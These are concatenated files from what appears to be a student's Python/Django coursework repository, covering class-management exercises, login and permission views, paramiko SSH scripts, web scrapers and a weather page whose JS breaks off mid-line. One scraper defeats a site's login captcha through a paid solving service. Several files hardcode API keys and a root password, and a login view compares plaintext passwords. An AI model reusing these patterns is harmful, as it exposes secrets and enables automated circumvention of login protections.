id=3 3)select id,name from staff where id>1 4)select id,name from staff where name like lex 5)select * from staff where 1=1 <file_sep>/day6/作业/教研系统作业实例代码.py import sys import json import time # 学校 class School(): def __init__(self, school_name): self.name = school_name def creat_class(self): # 创建班级 print("欢迎创建班级".center(50, '-'), '\n') classroom_name = input("请输入班级名称: ") classroom_period = input("请输入班级周期: ") classroom_obj = Clsaaroom(classroom_name, classroom_period) # 班级类实例 print("创建班级成功".center(50, '-'), '\n') print("班级信息如下:".rjust(10)) classrooms[classroom_name] = classroom_obj # 将班级名和班级实例关联起来 classrooms_dict = { "班级名称":classroom_name, "班级周期":classroom_period } classroom_obj.show_classroom_info() f = open("班级信息.text",'w') f.write(json.dumps(classrooms_dict,ensure_ascii=False, indent=2))#dunps 参数必须要dict类型的 # dunps输出是二进制格式的 ensure_ascii = False 将输出转换成字符串格式 #json.dump(classrooms_obj, open("班级信息.text", "w", encoding='utf-8'), ensure_ascii=False, indent=2) control_view() # 从新调用选择功能函数 def creat_course(self): # 创建课程 print("欢迎创建课程: ".center(50, '-'), '\n') course_name = input("请输入课程名称: ") course_period = input("请输入课程周期: ") course_pay = input("请输入课程价格: ") course_obj = Course(course_name, course_period, course_pay) # 将课程类实例化 print("创建课程成功: ".center(50, '-'), '\n') courses[course_name] = course_obj # 将课程名和课程实例关联起来 course_dic ={"课程名称":course_name, "课程周期":course_period, "课程价格":course_pay} f = open("课程信息",'w') f.write(json.dumps(course_dic,ensure_ascii=False,indent=2)) course_obj.show_course_info() control_view() # 从新调用选择功能函数 def create_teacher(self):#创建讲师 print("创建讲师".center(50, '-')) teacher_name = input("请输入讲师姓名: ") teacher_sex = input("请输入讲师性别: ") teacher_age = input("请输入讲师年龄: ") teacher_school = input("请输入讲师所在学校: ") teacher_course = input("请输入讲师教授课程: ") teacher_classroom = input("请输入讲师所在班级: ") teacher_obj = Teacher(teacher_name, teacher_age, teacher_sex, teacher_course, teacher_school, teacher_classroom) # 实例化讲师 print("创建讲师成功".center(50, '-')) teachers[teacher_name] = 
teacher_obj # 关联讲师与讲师信息 teachers_dic= {"讲师姓名":teacher_name, "讲师性别":teacher_sex, "讲师年龄":teacher_age, "讲师所在学校":teacher_school, "讲师教授课程":teacher_course, "讲师所在班级":teacher_classroom} teacher_obj.show_teacher_info() control_view()#从新调用选择功能函数 # 班级类 class Clsaaroom(object): def __init__(self, classroom_name, classroom_period): self.classroom_name = classroom_name self.classroom_period = classroom_period def show_classroom_info(self): print("班级名称: %s\n班级周期: %s" % (self.classroom_name, self.classroom_period)) # 课程类 course class Course(object): def __init__(self, course_name, course_period, course_pay): # period 周期 price 价格 self.course_name = course_name self.course_period = course_period self.coyres_pay = course_pay def show_course_info(self): print("课程名称: %s\n课程周期: %s\n课程价格: %s" % (self.course_name, self.course_period, self.coyres_pay)) # 人员类 class Person(object): def __init__(self, name, age, sex): self.name = name self.age = age self.sex = sex # 讲师类 class Teacher(Person): def __init__(self, teacher_name, teacher_age, teacher_sex, teacher_course, teacher_school, teacher_classroom): super(Teacher, self).__init__(teacher_name, teacher_age, teacher_sex) self.teacher_course = teacher_course self.teacher_school = teacher_school self.teacher_classroom = teacher_classroom def show_teacher_info(self): print(""" ——————讲师信息—————— 讲师: %s 性别: %s 年龄: %s 讲师所在学校: %s 讲师所在班级: %s 讲师教授课程: %s """ % (self.name, self.sex, self.age, self.teacher_course, self.teacher_classroom, self.teacher_school)) # 学生类 class Student(Person): def __init__(self, student_name, student_age, student_sex, student_course, student_id, student_period): super(Student, self).__init__(student_name, student_age, student_sex) self.student_course = student_course self.student_id = student_id self.student_period = student_period def show_student_info(self): print(""" ——————学员信息—————— 讲师: %s 性别: %s 年龄: %s 学生学号: %s 学生报名课程: %s 课程周期: %s """% (self.name, self.sex, self.age, self.student_id, self.student_course, 
self.student_period)) # course 课程 period 周期 def Create_stdent():#创建学员 student_name = input("请输入学生姓名; ") student_age = input("请输入学生年龄: ") student_sex = input("请输入学生性别: ") student_id = input("请输入学生学号: ") student_course = input("请输入学生所选课程: ") student_period = input("请输入课程周期: ") student_obj = Student(student_name, student_age, student_sex, student_id,student_course,student_period)#实例化学生类 students[student_name] = student_obj students_dict = {"学生姓名":student_name, "学生年龄":student_age, "学生性别":student_sex, "学生学号":student_id, "学生所选课程":student_course, "课程周期":student_period } student_obj.show_student_info() f = open("学生信息",'a') f.write(json.dumps(students_dict,ensure_ascii= False,indent = 2)) def Student_view(): print("欢迎进入学生视图".center(50,'-')) student_choice_id = input("请选择功能: " "1.注册" "2.缴费" "3.选择班级" "4.返回" "5.退出" ) if student_choice_id == 1: Create_stdent() elif student_choice_id == 2: pass elif student_choice_id == 3: pass def Teacher_view(): pass def control_view():#管理视图 choice_id = input("\n*************************请选择功能********************\n" "1.创建班级" "2.创建课程" "3.创建讲师" "4.返回" "5.退出\n: ") #choice_id = int(choice_id) # input 输入时字符串格式下面的 choice 是int 类型 需要进行类型转换 if choice_id == '1': schoolid.creat_class() elif choice_id == '2': schoolid.creat_course() elif choice_id == '3': #print("你好") schoolid.create_teacher() #print("你好") elif choice_id == '4': select_fun() elif choice_id == '5': sys.exit() def select_school(): # 选择学校 global schoolid choice_school_id = input("\n*************************请选择学校********************\n" "a.北京大学" "b.清华大学" "q.退出\n: ") if choice_school_id == 'a': schoolid = school1 elif choice_school_id == 'b': schoolid = school2 elif choice_school_id == 'q': sys.exit() else: print("\033[4;35m请输入真确的选项:\033[0m") def select_fun(): # 选择功能 choice_id = input("\n*************************请选择功能********************\n" "1.学院视图" "2.讲师视图" "3.管理视图" "4.返回\n: ") # choice_id = int(choice_id) #input 输入时字符串格式下面的 choice 是int 类型 需要进行类型转换 if choice_id == '1': print("待完善") elif 
choice_id == '2':
        print("待完善")
    elif choice_id == '3':
        control_view()
        # print("你好11111")
    elif choice_id == '4':
        select_school()
    else:
        return
    time.sleep(2)
    # schoolid.creat_class()


def main():
    # Entry point: pick a school, then loop over the feature menu.
    # Create_stdent()
    # print("aaa")
    while True:
        select_school()
        while True:
            select_fun()


if __name__ == '__main__':
    # Global registries mapping names to their created instances.
    classrooms = {}
    courses = {}
    teachers = {}
    students = {}
    school1 = School("北大")
    school2 = School("清华")
    main()
<file_sep>/day7/student_guanlisystem/conf/settings.py
# Relative paths (from the program's working directory) to the
# flat-file "database" files used by the student management system.
userinfo = '../db/userinfo'
school_info = '../db/school_info'
course_info = '../db/course_info'
class_info = '../db/class_info'
teacher_info = '../db/teacher_info'
student_info = '../db/student_info'
classes_dir = '../db/classes'
<file_sep>/day24/auto - 12 - 权限粒度控制到按钮/app01/views.py
from django.shortcuts import render, HttpResponse, redirect
from rbac.service.permission import init_permission
from rbac import models


def login(request):
    """
    User login: GET renders the form; POST validates credentials,
    initializes the session permission structure, then redirects.
    :param request:
    :return:
    """
    if request.method == "GET":
        return render(request, 'app01/login.html')
    user = request.POST.get('user')
    pwd = request.POST.get('pwd')
    # NOTE(review): plaintext password comparison — no hashing; confirm intended for demo only
    user = models.UserInfo.objects.filter(username=user, password=pwd).first()
    if not user:
        return render(request, 'app01/login.html', {'msg': '用户名或密码错误'})
    init_permission(user, request)
    return redirect('/app01/user/')


def user_list(request):
    """
    User list page (hard-coded demo data, no database query).
    :param request:
    :return:
    """
    user_queryset = [
        {'id': '1', 'name': '王振兴'},
        {'id': '2', 'name': '高栋'},
        {'id': '3', 'name': '乔瑞武'},
    ]
    return render(request, 'app01/user_list.html', {'user_queryset': user_queryset})


def user_add(request):
    # Render the "add user" page (no form handling in this demo).
    return render(request, 'app01/user_add.html')


def user_edit(request, nid):
    # Render the "edit user" page for user id `nid` (id unused in this demo).
    return render(request, 'app01/user_edit.html')


def user_del(request, nid):
    # Pretend to delete user `nid` and report success.
    return HttpResponse('删除成功')


def center(request):
    # Render the personal-center page.
    return render(request, 'app01/center.html')
<file_sep>/day17/s21/app01/views.py
from django.shortcuts import render, HttpResponse, redirect
from app01 import models
from app01 import my_md5
from functools import wraps


# session login-check decorator
def
login_check(func): @wraps(func) def inner(request, *args, **kwargs): next_url = request.path_info # print(path) # next_url=request.get_full_path() # print("next_url第一个", next_url) if request.session.get('user'): # session里面获取url return func(request, *args, **kwargs) else: return redirect("/login/?next_url={}".format(next_url)) return inner # 注销页面 @login_check def logout(request): # 删除所有当前请求相关的session request.session.delete() return redirect("/login/") # 登录页面 def login(request): if request.method == "POST": user = request.POST.get("username") # 这里的username必须和html里面的name的值一致 pwd = request.POST.get("password") if user == "" or pwd == "": data = '用户名或密码不能为空' return render(request, "login.html", {"data": data}) else: try: obj = models.User.objects.get(username=user) except Exception: data = "此用户不存在" return render(request, "login.html", {"data": data}) if obj.username == user and obj.password == <PASSWORD>(user, pwd): request.session.set_expiry(0) # 设置过期时间,浏览器关闭就失效 request.session['user'] = obj.username # 获取的登录的用户名 next_url=request.GET.get("next_url") # 获取url后面拼接的路径 # print(next_url) #结果为空 if next_url: return redirect(next_url) else: return redirect("/show_user/") else: data = '用户名和密码错误' return render(request, "login.html", {"data": data}) else: return render(request, 'login.html') # 展示页面 @login_check def show_user(request): current_user = request.session.get("user", None) # 获取用户名 data = models.User.objects.all() return render(request, "user/show_user.html", {"v": current_user, "data": data}) # 注册页面 def register_user(request): if request.method == "POST": # 获取用户添加的用户名和密码 user = request.POST.get("username") pwd = request.POST.get("password") if user == "" or pwd == "": # return HttpResponse("用户名和密码不能为空") data = '用户名和密码不能为空' return render(request, "user/register_user.html", {"data": data}) else: # 写入到数据库 try: models.User.objects.create(username=user, password=<PASSWORD>(user, pwd)) except Exception: data = '用户名已经存在' return render(request, "user/register_user.html", 
{"data": data}) data = '注册成功,请登录' return render(request, "user/register_user.html", {"data": data}) else: return render(request, "user/register_user.html") # 删除用户 def del_user(request): # 获取用户要删除的id del_id = request.GET.get("id") # 去数据库里面删除 models.User.objects.get(id=del_id).delete() # 返回展示页面 return redirect("/show_user/") # 编辑用户 def edit_user(request): if request.method == "POST": edit_id = request.POST.get("id") new_user = request.POST.get("username") new_pwd = request.POST.get("password") obj = models.User.objects.get(id=edit_id) obj.username = new_user obj.password = <PASSWORD>(<PASSWORD>) try: obj.save() except Exception: data = '用户名已经存在' return render(request, "user/edit_user.html", {"data": data}) return redirect("/show_user/") else: edit_id = request.GET.get("id") obj = models.User.objects.get(id=edit_id) v = request.session.get('user') if v: # 把要编辑的用户展示在这个页面上面 return render(request, "user/edit_user.html", {"user": obj, "v": v}) else: return redirect("/login/") # 增加用户 @login_check def add_user(request): if request.method == "POST": # 获取用户添加的用户名和密码 user = request.POST.get("username") pwd = request.POST.get("password") if user == "" or pwd == "": data = '用户名和密码不能为空' return render(request, "user/add_user.html", {"data": data}) else: # 写入到数据库 try: models.User.objects.create(username=user, password=<PASSWORD>(user, pwd)) except Exception: data = '用户名已经存在' return render(request, "user/add_user.html", {"data": data}) return redirect("/show_user/") else: v = request.session.get('user') if v: return render(request, "user/add_user.html", {"v": v}) else: return redirect("/login/") # 主机管理 # 查看 @login_check def show_host(request): current_user = request.session.get("user", None) # 获取用户名 data = models.Host.objects.all() return render(request, "host/show_host.html", {"v": current_user, "host_list": data}) # # 增加 @login_check def add_host(request): if request.method == "POST": name = request.POST.get("hostname") password = request.POST.get("password") id = 
request.POST.get("service") if name == "" or password == "": data = "主机名或密码不能为空" return render(request, "host/add_host.html", {"data": data}) else: old_name = models.Host.objects.filter(hostname=name) if old_name: data = "主机名已存在" return render(request, "host/edit_host.html", {"data": data}) else: models.Host.objects.create(hostname=name, service_id=id, pwd=password) return redirect("/show_host/") else: v = request.session.get('user') if v: host = models.Service.objects.all() return render(request, "host/add_host.html", {"host_list": host, "v": v}) else: return redirect("/login/") # 编辑 def edit_host(request, pk): if request.method == "GET": v = request.session.get('user') if v: # 获取机器id host_id = models.Host.objects.get(id=pk) service_obj = models.Service.objects.all() return render(request, "host/edit_host.html", {"host": host_id, "service_list": service_obj, "v": v}) else: return redirect("/login/") else: # 获取机器对象 host_obj = models.Host.objects.get(id=pk) # 获取主机名 new_hostname = request.POST.get("hostname") # print(new_hostname) # 获取密码 new_pwd = request.POST.get("password") # 获取所在业务名称 new_service_id = request.POST.get("service") # 更改 host_obj.hostname = new_hostname host_obj.pwd = <PASSWORD> host_obj.service_id = new_service_id old_name = models.Host.objects.filter(hostname=new_hostname) if old_name: data = "主机名已存在" return render(request, "host/edit_host.html", {"data": data}) else: host_obj.save() return redirect("/show_host/") # 删除主机 def del_host(request, pk): if request.method == "GET": models.Host.objects.get(id=pk).delete() return redirect("/show_host/") <file_sep>/cmdb/auto_client - 7 - 资产信息入库/src/engine/agent.py #!/usr/bin/python # -*- coding:utf-8 -*- import os import json import requests from .base import BaseHandler from ..plugins import get_server_info from config import settings class AgentHandler(BaseHandler): def cmd(self,command,hostname=None): import subprocess return subprocess.getoutput(command) def handler(self): """ 处理Agent模式下的资产采集:网卡、内存、硬盘 
:return: """ # 1. 通过调用get_server_info获取所有的资产信息:网卡、内存、硬盘 info = get_server_info(self) # 2. 获取本地文件中的唯一标识 if not os.path.exists(settings.CERT_FILE_PATH): # 新服务器,给API之后,应该在数据库中增加数据 info['type'] = 'create' else: with open(settings.CERT_FILE_PATH,'r',encoding='utf-8') as f: cert = f.read() if cert == info['basic']['data']['hostname']: # 主机名未变更,汇报给API,API做更新 info['type'] = 'update' else: info['cert'] = cert info['type'] = 'host_update' # 3. 发送到api r1 = requests.post( url=self.asset_api, data=json.dumps(info).encode('utf-8'), headers={ 'Content-Type':'application/json' } ) response = r1.json() # 4. 唯一标识更新 if response['status']: with open(settings.CERT_FILE_PATH, 'w', encoding='utf-8') as f: f.write(response['data']) <file_sep>/deploy/script/5.paramiko.py """ pip3 install paramiko 管理工具: - saltstack - salt-ssh - agent(RPC) - ansible - ssh - fabric - 给开发提供接口 """ # ################# 基于paramiko远程连接服务器并执行命令【用户名密码】 ################# """ import paramiko # 创建SSH对象 ssh = paramiko.SSHClient() # 允许连接不在know_hosts文件中的主机 ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) # 连接服务器 ssh.connect(hostname='192.168.16.175', port=22, username='root', password='123') # 执行命令 stdin, stdout, stderr = ssh.exec_command('df') # 获取命令结果 result = stdout.read() # 关闭连接 ssh.close() print(result) """ # ################# 基于paramiko远程连接服务器并执行命令【秘钥】 ################# """ import paramiko private_key = paramiko.RSAKey.from_private_key_file('本地私钥') # 前提要把公钥推送到服务器 # 创建SSH对象 ssh = paramiko.SSHClient() # 允许连接不在know_hosts文件中的主机 ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) # 连接服务器 ssh.connect(hostname='c1.salt.com', port=22, username='用户名', pkey=private_key) # 执行命令 stdin, stdout, stderr = ssh.exec_command('df') # 获取命令结果 result = stdout.read() # 关闭连接 ssh.close() """ # ################# 基于paramiko远程连接服务器并上传下载文件【用户名密码】 ################# # """ # import paramiko # transport = paramiko.Transport(('192.168.16.175', 22,)) # transport.connect(username='root', password='123') # sftp = 
paramiko.SFTPClient.from_transport(transport) # # 将location.py 上传至服务器 /tmp/test.py # sftp.put(r'D:\s22\s22day25\x1.py', '/data/x1.py') # # 将remove_path 下载到本地 local_path # # sftp.get('/data/x1.py', r'D:\s22\s22day25\x2.py') # transport.close() # """ # ################# 基于paramiko远程连接服务器并上传下载文件【秘钥】 ################# """ import paramiko private_key = paramiko.RSAKey.from_private_key_file('/home/auto/.ssh/id_rsa') transport = paramiko.Transport(('hostname', 22)) transport.connect(username='wupeiqi', pkey=private_key) sftp = paramiko.SFTPClient.from_transport(transport) # 将location.py 上传至服务器 /tmp/test.py sftp.put('/tmp/location.py', '/tmp/test.py') # 将remove_path 下载到本地 local_path sftp.get('remove_path', 'local_path') transport.close() """ # ################################# 基于秘钥字符串 ######################## import paramiko from io import StringIO key_str = """-----BEGIN OPENSSH PRIVATE KEY----- <KEY> -----END OPENSSH PRIVATE KEY----- """ file_obj=StringIO(key_str) private_key = paramiko.RSAKey() transport = paramiko.Transport(('192.168.7.32', 22)) transport.connect(username='root', pkey=private_key) ssh = paramiko.SSHClient() ssh._transport = transport stdin, stdout, stderr = ssh.exec_command('df') result = stdout.read() transport.close() print(result) <file_sep>/day27/s21crm/crm/views/record.py from django.shortcuts import render, redirect, HttpResponse from crm import models from crm.forms.record import RecordModelForm from django.urls import reverse def record_list(request, nid): """ 跟进记录 :param nid: 客户ID :param request: :return: """ current_user_id = request.session['user_info']['id'] # 当前登录用户id # 查看该客户是否属于当前登录用户的私户,如果不是无权查看 exists = models.Customer.objects.filter(id=nid, consultant_id=current_user_id).exists() if not exists: return HttpResponse('只能查看自己客户的跟进记录') queryset = models.ConsultRecord.objects.filter(customer_id=nid) return render(request, 'record_list.html', {'queryset': queryset, 'cid': nid}) def record_add(request, cid): """ :param request: :param cid: 
:return: """ if request.method == 'GET': form = RecordModelForm() return render(request, 'record_add.html', {'form': form}) form = RecordModelForm(data=request.POST) if form.is_valid(): # 添加的时候需要把客户id和当前登录用户的id都同时提交 form.instance.customer_id = cid # 客户id form.instance.consultant_id = request.session['user_info']['id'] # 当前登录id form.save() return redirect(reverse('record_list', args=(cid,))) return render(request, 'record_list.html', {'form': form}) <file_sep>/day27/s21crm/crm/views/private.py from django.shortcuts import render, redirect from crm import models from crm.forms.private import ParivateCustomModelForm from django.urls import reverse def private_customer_list(request): """ 私户列表 :param request: :return: """ if request.method == "POST": # 当用户点击申请到私户的时候执行下面代码 id_list = request.POST.getlist('pk') # 获取客户id # 找到私户,并且把当前的私户剔除到公户 models.Customer.objects.filter(id__in=id_list).update(consultant_id=None) current_user_id = request.session['user_info']['id'] # 获取当前登录用户id queryset = models.Customer.objects.filter(consultant=current_user_id).order_by('-status') # 查询当前用户的客户,并且按照报名状态倒叙 return render(request, 'private_custom_list.html', {'queryset': queryset}) def private_customer_add(request): """ 私户添加 :param request: :return: """ if request.method == "GET": form = ParivateCustomModelForm() return render(request, 'private_custom_add.html', {'form': form}) form = ParivateCustomModelForm(data=request.POST) if form.is_valid(): # 课程顾问自己添加客户的时候,默认就是私户 form.instance.consultant_id = request.session['user_info']['id'] # 把课程顾问id设置成当前登录用户的id form.save() return redirect('private_customer_list') else: return render(request, 'private_custom_add.html', {'form': form}) def private_customer_edit(request, nid): """ 编辑私户 :param request: :param nid: :return: """ obj = models.Customer.objects.filter(id=nid).first() if request.method == "GET": form = ParivateCustomModelForm(instance=obj) # 加上instance才能在编辑页面显示原来的数据 return render(request, 'private_custom_edit.html', {"form": form}) form = 
ParivateCustomModelForm(data=request.POST, instance=obj) # data是把编辑好的数据提交过去 if form.is_valid(): form.save() return redirect('private_customer_list') else: return render(request, 'private_custom_edit.html', {"form": form}) <file_sep>/day25/ower/玩.py import requests from lxml import etree import os url = 'http://www.umei.cc/p/gaoqing/rihan/%s.htm' headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36', } # 创建文件夹 if not os.path.exists('img'): os.mkdir('img') page_start = int(input('enter start page:')) page_end = int(input('enter end page:')) for page in range(page_start, page_end + 1): print('正在下载第%d页图片' % page) new_url = format(url % page) # print(new_url) response = requests.get(url=new_url, headers=headers) page_text = response.text # 实例化一个etree对象,并且将页面数据放到etree tree = etree.HTML(page_text) div_list = tree.xpath('//div[@class="TypeList"]') # 写入到文件 for div in div_list: img_url = div.xpath('//div[@class="TypeList"]//ul/li/a/img//@src') for eva_url in img_url: # print(eva_url) img_full_url=eva_url img_name=eva_url.split('/')[-1] img_data = requests.get(url=img_full_url, headers=headers).content img_path = 'img/' + img_name with open(img_path, 'ab')as f: f.write(img_data) <file_sep>/day25/homework/云打码平台使用流程/cookie带验证码.py import requests from lxml import etree import YunDaMa # 该函数是用来使用云大码平台接口进行验证码识别,返回验证码对应的数据值 def getCode(): # 普通用户用户名 username = 'bobo328410948' # 密码 password = '<PASSWORD>' # 软件ID,开发者分成必要参数。登录开发者后台【我的软件】获得! appid = 6003 # 软件密钥,开发者分成必要参数。登录开发者后台【我的软件】获得! 
appkey = '1f4b564483ae5c907a1d34f8e2f2776c' # 图片文件 filename = './code.png' # 验证码类型,# 例:1004表示4位字母数字,不同类型收费不同。请准确填写,否则影响识别率。在此查询所有类型 http://www.yundama.com/price.html codetype = 2004 # 超时时间,秒 timeout = 5 # 检查 if (username == 'username'): print('请设置好相关参数再测试') else: # 初始化 yundama = YunDaMa.YDMHttp(username, password, appid, appkey) # 登陆云打码 uid = yundama.login(); print('uid: %s' % uid) # 查询余额 balance = yundama.balance(); print('balance: %s' % balance) # 开始识别,图片路径,验证码类型ID,超时时间(秒),识别结果 cid, result = yundama.decode(filename, codetype, timeout); print('cid: %s, result: %s' % (cid, result)) return result # 对带验证码的人人网登录页面进行请求发送,目的获取验证码图片 url = 'http://www.renren.com/SysHome.do' headers = { # 对UA进行重写操作(伪装) 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64)AppleWebKit/537.36(KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36' } page_textBymainPage = requests.get(url=url, headers=headers).text # 解析出验证码图片,下载到本地 tree = etree.HTML(page_textBymainPage) codeImg_url = tree.xpath('//*[@id="verifyPic_login"]/@src')[0] codeImg_data = requests.get(url=codeImg_url, headers=headers).content with open('./code.png', 'wb') as fp: fp.write(codeImg_data) print('验证码下载成功') # 进行登录操作,为了获取cookie # 云打码流程: # 注册普通和开发者用户 # 在开发者用户中下载示例代码 HTTPPython # 在开发者用户中创建一个软件 # code = input('enter a code:') code = getCode() session = requests.session() url = 'http://www.renren.com/ajaxLogin/login?1=1&uniqueTimestamp=2018901710806' data = { 'rkey': '<KEY>', 'password': '<PASSWORD>', 'origURL': 'http://www.renren.com/home', 'key_id': '1', 'icode': code, 'f': '', 'email': '<EMAIL>', 'domain': 'renren.com', 'captcha_type': 'web_login', } # 获取请求成功后的cookie数据(session) session.post(url=url, data=data) # 使用携带了cookie的session进行二级子页面的请求发送 url = 'http://www.renren.com/289676607/profile' page_text = session.get(url=url, headers=headers).text with open('./renren.html', 'w', encoding='utf-8') as fp: fp.write(page_text)<file_sep>/day9/进程/锁.py # import os # import time # import random # from multiprocessing import Process,Lock 
# # def work(n,lock): # lock.acquire()#取的钥匙 # print('%s:%s is running'%(n,os.getpid())) # time.sleep(random.random()) # print('%s:%s is done' %(n,os.getpid())) # lock.release()#释放 # if __name__ == '__main__': # lock=Lock() # for i in range(3): # p=Process(target=work,args=(i,lock)) # p.start() # 牺牲效率但是保证了数据的安全 from multiprocessing import Process,Lock import time,json,random def search():#查票 dic=json.load(open('db')) print('\033[31m剩余票数%s\033[0m' %dic['count']) def get(num):#买票 dic=json.load(open('db')) time.sleep(random.random()) #模拟读数据的网络延迟 if dic['count'] >0: dic['count']-=1 time.sleep(random.random()) #模拟写数据的网络延迟 json.dump(dic,open('db','w')) print('\033[31m用户%s购票成功\033[0m'%num) def task(num,lock): search() lock.acquire() get(num) lock.release() if __name__ == '__main__': lock = Lock() for i in range(10): #模拟并发10个客户端抢票 p=Process(target=task,args = (i,lock)) p.start() <file_sep>/day2/02 list.py #增 #insert 插入 # append 追加 #删除 #pop 有返回值 按照索引删除 #remove #clear #del #改 #按照索引改 #按照切片去改 #查 #按照索引去查询,按照切片去查询 # 其他方法: #count 计数 #len #sort 从小到大 #sort(reverse=True) #从大到小排序 #reverse 反向输出 <file_sep>/day25/ajax_post请求.py # # 需求:爬取肯德基餐厅查询http://www.kfc.com.cn/kfccda/index.aspx中指定地点的餐厅数据 # import requests # # # 请求的url(抓包工具里面的raw里面获取的) # url = 'http://www.kfc.com.cn/kfccda/ashx/GetStoreList.ashx?op=keyword' # # 定制请求头信息,相关的头信息必须封装在字典结构中 # headers = { # # 定制请求头中的User-Agent参数,当然也可以定制请求头中其他的参数 # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36', # } # # 定制post请求携带的参数(抓包工具里面的webforms里面获取的) # data = { # 'cname': '', # 'pid': '', # 'keyword': '邯郸', # 'pageIndex': '1', # 'pageSize': '10' # } # # # 发起post请求,获取响应对象 # response = requests.get(url=url, headers=headers, data=data) # # # 获取响应内容:响应内容为json串 # print(response.text) import requests import urllib.request if __name__ == "__main__": # 指定ajax-post请求的url(通过抓包进行获取) url = 'http://www.kfc.com.cn/kfccda/ashx/GetStoreList.ashx?op=keyword' # 定制请求头信息,相关的头信息必须封装在字典结构中 
headers = { # 定制请求头中的User-Agent参数,当然也可以定制请求头中其他的参数 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36', } # 定制post请求携带的参数(从抓包工具中获取) data = { 'cname': '', 'pid': '', 'keyword': '北京', 'pageIndex': '1', 'pageSize': '10' } # 发起post请求,获取响应对象 response = requests.get(url=url, headers=headers, data=data) # 获取响应内容:响应内容为json串 print(response.text) <file_sep>/auto_server/repository/admin.py from django.contrib import admin from . import models admin.site.register(models.Server) admin.site.register(models.Memory) admin.site.register(models.NIC) admin.site.register(models.Disk) admin.site.register(models.ServerRecord) # Register your models here. <file_sep>/day19/homework/s21/app01/migrations/0008_user_services.py # -*- coding: utf-8 -*- # Generated by Django 1.11.11 on 2018-08-22 07:16 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('app01', '0007_auto_20180815_1446'), ] operations = [ migrations.AddField( model_name='user', name='services', field=models.ManyToManyField(related_name='user', to='app01.Service'), ), ] <file_sep>/day22/luffy_permission/rbac/service/permission.py from django.conf import settings def init_permission(request, user_obj): ''' 在session中初始化权限信息和菜单信息的函数 :param request: 请求对象 :param user_obj:当前登录用户 :return: ''' # user_obj.roles.all()那到当前用户的所有角色 ret = user_obj.roles.all().values("permissions__url", "permissions__icon", "permissions__is_menu", "permissions__title" ).distinct() # 取到去重之后的权限 # 定义一个权限列表 permission_list = [] # 定义一个专门用来存放当前用户菜单的列表 menu_list = [] for item in ret: print(item) # item是个大列表 permission_list.append({"permissions__url": item["permissions__url"]}) # 添加到权限列表 if item["permissions__is_menu"]: # 如果为真 menu_list.append({ "title": item["permissions__title"], "icon": item["permissions__icon"], "url": item["permissions__url"] }) # 将用户权限列表信息,存到session中 
request.session[settings.PERMISSION_SESSION_KEY] = permission_list # 把当前用户的所有菜单存放到sessioin request.session[settings.MENU_SESSION_KEY] = menu_list <file_sep>/day9/client.py import socket sk=socket.socket() sk.connect(('127.0.0.1',9000)) print(sk.recv(1024)) print(sk.recv(1024)) sk.close() <file_sep>/deploy/web/views/project.py from django.shortcuts import render,HttpResponse,redirect from web.forms.project import ProjectModelForm from web import models from web.utils.pager import Pagination from web.utils.urls import memory_reverse def project_list(request): page = request.GET.get('page', 1) # 数据库中数据总条数 total_count = models.Project.objects.all().count() # 数据库中获取即可 pager = Pagination(page, total_count, request.path_info) depart_queryset = models.Project.objects.all()[pager.start:pager.end] return render(request, 'project_list.html', {'depart_queryset': depart_queryset, 'pager': pager}) def project_add(request): """ 添加项目 :param request: :return: """ if request.method == 'GET': form = ProjectModelForm() return render(request, 'form.html', {'form':form}) form = ProjectModelForm(data=request.POST) # 对用户提交的数据进行校验 if form.is_valid(): form.save() return redirect(memory_reverse(request,'project_list')) return render(request, 'form.html', {'form': form}) def project_edit(request,nid): """ 编辑项目 :param request: :param nid: 当前要编辑的部门ID :return: """ obj = models.Project.objects.filter(id=nid).first() # 包含此行的所有数据 if request.method == "GET": # 生成HTML标签 + 携带默认值 form = ProjectModelForm(instance=obj) return render(request,'form.html',{'form':form}) # 带默认值 form = ProjectModelForm(data=request.POST,instance=obj) if form.is_valid(): form.save() return redirect(memory_reverse(request,'project_list')) return render(request, 'form.html', {'form': form}) def project_del(request,nid): """ 删除项目 :param request: :param nid: :return: """ origin = memory_reverse(request,'project_list') if request.method == 'GET': return render(request, 'delete.html', {'cancel': origin}) 
models.Project.objects.filter(id=nid).delete() return redirect(origin)<file_sep>/deploy/web/forms/project.py from django.forms import ModelForm from web.forms.base import BootStrapModelForm from web import models class ProjectModelForm(BootStrapModelForm): class Meta: model = models.Project fields = "__all__" def __init__(self, *args, **kwargs): super(ProjectModelForm, self).__init__(*args, **kwargs) self.fields['private'].widget.attrs['class'] = '' # 让是否为私有去除样式 <file_sep>/day14/作业/百度天气/js/baidu.js // window.onload=function (ev) { // var cart = document.getElementsByClassName('city','wheater')[0]; // var cart2=document.getElementsByClassName('wheater')[0]; // // cart.onmouseover=function () { // // cart2.style.display='block'; // }; // cart.onmouseout=function () { // cart2.style.display='none'; // // }; // }; $(function () { $.ajax({ url:'https://free-api.heweather.com/s6/weather/forecast?location=beijing&key=7e2f47ead8a94ecab4b9e04f1f8d4a3f', type:'get', success:function (data) { // console.log(data.HeWeather6[0]); // console.log(data.HeWeather6[0].daily_forecast[0].cond_code_d); $('.left-top .tianqi img').attr('src',"./img/"+data.HeWeather6[0].daily_forecast[0].cond_code_d+'.png'); $('.one img').attr('src',"./img/"+data.HeWeather6[0].daily_forecast[0].cond_code_d+'.png'); $('.there .day1 img').attr('src',"./img/"+data.HeWeather6[0].daily_forecast[0].cond_code_d+'.png'); $('.there .day2 img').attr('src',"./img/"+data.HeWeather6[0].daily_forecast[1].cond_code_d+'.png'); $('.there .day3 img').attr('src',"./img/"+data.HeWeather6[0].daily_forecast[2].cond_code_d+'.png'); // 日期设置 $('.wheater .two .date').text(data.HeWeather6[0].daily_forecast[0].date);//设置第二行日期 $('.there .day1 .date').text(data.HeWeather6[0].daily_forecast[0].date); $('.there .day2 .date').text(data.HeWeather6[0].daily_forecast[1].date); $('.there .day3 